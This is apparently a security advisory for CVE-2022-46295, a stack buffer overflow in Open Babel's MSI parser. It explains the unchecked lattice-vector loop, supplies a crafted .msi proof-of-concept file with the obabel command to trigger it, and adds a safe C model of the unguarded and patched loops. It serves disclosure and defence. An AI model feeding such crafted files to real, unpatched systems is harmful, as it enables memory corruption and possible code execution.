CVE-2022-46295: Open Babel MSI Parser Stack Buffer Overflow
A crafted MSI chemistry file can overflow a fixed-size stack array in Open Babel's MSI parser, letting an attacker write arbitrary data past the end of the buffer and potentially execute code.
The problem
Open Babel's MSI format reader in `msiformat.cpp` declares a fixed-size `translationVectors[]` array on the stack to hold unit-cell lattice vectors. The `ReadMolecule` loop reads lines after a `PeriodicType` keyword and writes a new vector entry for every line containing exactly 6 whitespace-separated tokens.
The loop has no upper-bound check on `numTranslationVectors`, so a file with more qualifying lines than the array holds makes every extra iteration write past the end of the stack buffer. The x, y, z values are parsed from the attacker's own tokens, so the bytes landing beyond the array are the IEEE-754 encodings of attacker-chosen numbers: not every byte pattern is reachable through a decimal literal, but enough are to corrupt saved registers or a return address with useful values, which is why arbitrary code execution is considered feasible (CVSS 7.8).
Proof of concept
A crafted .msi file that triggers the overflow in openbabel. The comments show how to feed it to obabel; each lattice-vector line after `PeriodicType` tokenizes to exactly the 6 whitespace-separated tokens the loop looks for.
# Minimal crafted .msi file that overflows translationVectors[]
# Feed to: obabel -i msi evil.msi -o sdf
# Each "(A D A3 (x y z))" line after PeriodicType splits into 6 whitespace-separated tokens -> one vector written.
# More than 3 such lines overflow the fixed stack array.
(1 Model
(2 PeriodicType
(A I OrderParameter 3)
)
(3 Lattice3D
(A D A3 (1.0 0.0 0.0))
(A D A3 (0.0 1.0 0.0))
(A D A3 (0.0 0.0 1.0))
(A D A3 (9.9 9.9 9.9))
(A D A3 (8.8 8.8 8.8))
(A D A3 (7.7 7.7 7.7))
)
)

The vulnerable while loop in `MSIFormat::ReadMolecule` (msiformat.cpp) entered a branch on detecting `"PeriodicType"`, then read subsequent lines and called `translationVectors[numTranslationVectors++].Set(x, y, z)` for every line with 6 tokens, with no check that `numTranslationVectors` was still within the array bounds.
Because `Set()` stores three `double` values (24 bytes) per call, each extra iteration advances 24 bytes past the end of the stack-allocated array and overwrites whatever the compiler placed above it (neighbouring locals, saved registers or the return address, depending on frame layout) with attacker-supplied floating-point values. The patch (commit 40e85213) adds a bounds check on `numTranslationVectors` against the array size, so no write past the last element can occur.
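To make the loop shape concrete, here is an added example in C (not Open Babel's code): a minimal model of the lattice-vector loop described above in both its unguarded shape and a bounds-checked shape, run over a constructed .msi snippet with six A3 lines. The array capacity of 3, the function names and the sample input are assumptions for illustration; the unguarded model counts the writes the real loop would issue rather than performing them, so it runs safely.

```c
/* Added example, not Open Babel's code: a C model of the MSI lattice-vector
 * loop in its unguarded and bounds-checked shapes, run over a constructed
 * .msi snippet. Capacity 3, all names and the sample are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_VECTORS 3 /* assumed capacity of translationVectors[] */
#define MAX_TOKENS 16
#define LINE_CAP 256
typedef struct { double x, y, z; } vector3;

/* Constructed input: three real lattice vectors plus three extra A3 lines. */
static const char SAMPLE_MSI[] =
    "(1 Model\n(2 PeriodicType\n(A I OrderParameter 3)\n)\n(3 Lattice3D\n"
    "(A D A3 (1.0 0.0 0.0))\n(A D A3 (0.0 1.0 0.0))\n(A D A3 (0.0 0.0 1.0))\n"
    "(A D A3 (9.9 9.9 9.9))\n(A D A3 (8.8 8.8 8.8))\n(A D A3 (7.7 7.7 7.7))\n)\n)\n";

/* Copy the next line of p into line[] (clipped to cap); return the start of
 * the following line, or NULL at end of input. */
static const char *next_line(const char *p, char *line, size_t cap)
{
    if (p == NULL || *p == '\0') return NULL;
    const char *nl = strchr(p, '\n');
    size_t n = nl ? (size_t)(nl - p) : strlen(p);
    if (n >= cap) n = cap - 1;
    memcpy(line, p, n);
    line[n] = '\0';
    return nl ? nl + 1 : p + strlen(p);
}

/* Whitespace tokenizer in the spirit of Open Babel's tokenize(): splits buf
 * in place, keeps up to max_tok pointers, returns the full token count. */
static int tokenize_line(char *buf, char *tok[], int max_tok)
{
    int n = 0;
    for (char *p = buf; *p != '\0';) {
        while (*p != '\0' && isspace((unsigned char)*p)) p++;
        if (*p == '\0') break;
        if (n < max_tok) tok[n] = p;
        n++;
        while (*p != '\0' && !isspace((unsigned char)*p)) p++;
        if (*p != '\0') *p++ = '\0';
    }
    return n;
}

/* A coordinate token is "(1.0" or "0.0))": skip '(' and let strtod stop at ')'. */
static double num_token(const char *t)
{
    while (*t == '(') t++;
    return strtod(t, NULL);
}

/* Unguarded shape: after "PeriodicType", every 6-token line is one
 * translationVectors[numTranslationVectors++].Set() call. Calls are counted,
 * not performed, so this is safe to run; a count above MAX_VECTORS means
 * writes past the array. Assumes the loop keeps scanning to end of input. */
int msi_count_unguarded_writes(const char *msi)
{
    char line[LINE_CAP], *tok[MAX_TOKENS];
    int in_cell = 0, writes = 0;
    for (const char *p = msi; (p = next_line(p, line, sizeof line)) != NULL;) {
        if (!in_cell) { in_cell = strstr(line, "PeriodicType") != NULL; continue; }
        if (tokenize_line(line, tok, MAX_TOKENS) == 6) writes++;
    }
    return writes;
}

/* Bounds-checked shape: same scan, but a write is refused once the array is
 * full. Returns vectors stored; *truncated is set if the input had more. */
int msi_read_vectors_checked(const char *msi, vector3 out[], int cap, int *truncated)
{
    char line[LINE_CAP], *tok[MAX_TOKENS];
    int in_cell = 0, n = 0;
    *truncated = 0;
    for (const char *p = msi; (p = next_line(p, line, sizeof line)) != NULL;) {
        if (!in_cell) { in_cell = strstr(line, "PeriodicType") != NULL; continue; }
        if (tokenize_line(line, tok, MAX_TOKENS) != 6) continue;
        if (n >= cap) { *truncated = 1; break; } /* the guard the patch adds */
        out[n].x = num_token(tok[3]);
        out[n].y = num_token(tok[4]);
        out[n].z = num_token(tok[5]);
        n++;
    }
    return n;
}

/* Runs the checked reader over the sample: exactly MAX_VECTORS stored,
 * truncation flagged, first three vectors parsed as written. */
int sample_checked_ok(void)
{
    vector3 v[MAX_VECTORS];
    int truncated = 0, n = msi_read_vectors_checked(SAMPLE_MSI, v, MAX_VECTORS, &truncated);
    return n == MAX_VECTORS && truncated == 1 && v[0].x == 1.0 && v[1].y == 1.0 && v[2].z == 1.0;
}

int main(void)
{
    printf("unguarded: %d writes into %d slots; checked reader ok: %d\n",
           msi_count_unguarded_writes(SAMPLE_MSI), MAX_VECTORS, sample_checked_ok());
    return 0;
}
```

Compiled with `cc -std=c99 model.c && ./a.out`, the unguarded count comes back as 6 against an array of 3, which is exactly the three 24-byte out-of-bounds writes the crafted file above produces; the checked reader stores three vectors, flags the truncation, and never touches memory past the array. Whether a real reader should reject such a file outright or silently keep the first three vectors is a policy choice; refusing the write is the security-relevant part.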
The fix
Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains commit 40e852138f21d586b7ccdce6329e7b23a87168bb. That commit adds an explicit upper-bound guard on `numTranslationVectors` before each write into `translationVectors[]`. No workaround is available for older versions; avoid parsing untrusted MSI files with any version below 3.2.0.
Reported by Cisco Talos.
Related research
- CVE-2022-43467 (high, CVSS 7.8): Open Babel PQS Parser Out-of-Bounds Write
- CVE-2022-43607 (high, CVSS 7.8): Open Babel MOL2 Parser Stack Buffer Overflow
- CVE-2022-46291 (high, CVSS 7.8): Open Babel Gaussian Parser Stack Buffer Overflow via translationVectors
- CVE-2022-46293 (high, CVSS 7.8): Open Babel MOPAC Output Parser Stack Buffer Overflow